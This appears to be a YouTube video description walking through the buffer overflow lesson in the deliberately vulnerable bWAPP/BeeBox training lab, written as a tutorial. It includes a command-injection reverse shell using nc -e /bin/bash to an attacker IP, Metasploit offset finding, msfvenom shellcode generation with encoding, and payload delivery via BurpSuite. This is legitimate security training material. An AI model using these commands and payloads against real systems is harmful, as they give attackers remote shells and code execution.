bWAPP Buffer Overflow local скачать в хорошем качестве

bWAPP Buffer Overflow local

Buffer Overflow (Local) - Low Security Level Solution: Step 1. Give a movie name as an input which is part of current bWAPP database and check the output. (e.g. Hulk, Iron Man etc) Give a movie name which is not part of the database and check the output. (e.g. Time) Check the source code of the lesson (Please follow steps as shown in the video). Open bof_1.php document. From the source code we understand that the title is given straight as a commandline argument to the app. Step 2. To get the shell easy way, please use below command as shown in the video. $(nc -e /bin/bash 10.0.2.4 4444) *Change the IP address to your BeeBox IP Check the output. Step 3. To get the shell hard way Check the Hint given in the lesson page. Let us crash the application by giving it a string from Metasploit's pattern_create.rb a. Go to the command prompt and give command: locate pattern_create.rb Output: You will get the path. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb b. Go the folder where the pattern_create.rb file is located Use commands cd /usr/share/metasploit-framework/tools/exploit/ ls -l You can see the pattern_create.rb here Now - execute the file pattern_create.rb Commands: sudo ./pattern_create.rb (*Give password if necessary) sudo ./pattern_create.rb -h sudo ./pattern_create.rb -l 360 On executing the above command below output will be generated. Save the output in beebox machine. Step 4. Go to the beebox Open Command Prompt and go to the Folder path: /var/www/html/bWAPP/apps Use below command: gdb --args ./movie_search "the output which you have saved" (Please refer video). Note: I have already saved the command in beebox and using it directly. Use below commands in beebox - gdb run info registers Note eip register value got overwritten Step 5. In your local machine Give below commands ./pattern_offset.rb -q 0x41386c41 Check the Output - [*] Exact match at offset 354 In your beebox give below command (gdb) - x/100cb $esp Check the output - l 9 A m ... In your local machine give below command ./pattern_offset.rb -q l9Am Check the output - [*] Exact match at offset 358 In beebox open a new command prompt with path /var/www/bWAPP/apps# and use command: objdump -D ./movie_search | grep jmp.*esp Step 6. In your local machine generate payload with command: Note: As angled brackets is not allowed in YouTube Description, replacing the angled bracket with ), kindly make necessary change sudo msfvenom -p linux/x86/exec CMD=/bin/ps -b '\x00' -e x86/opt_sub -f raw ) /home/kali/Desktop/bofpayload.txt Give password (*if necessary), wait patiently till the payload is generated. Open new command prompt and go to the location where the file is saved and check the generated payload with command: cat bofpayload.txt Regenerate the payload with below command: (echo -n \'; cat /home/kali/Desktop/bofpayload.txt; echo -n \';) | perl -pe's/(.)/sprintf("%%%02X",ord($1))/seg' Step 7. Go to the lesson page and check the HINT. Let's use the HINT and make the exploit Follow steps as shown in the video. Step 8. Start BurpSuite Turn on the proxy Go to the lesson page and give any input of your choice in the search box and click on Search button. Go to the BurpSuite replace the given input with our exploit. Forward the request Go to the lesson page and check the output Explore the lesson further to get the reverse shell. (Not covered in this video). PseudoTime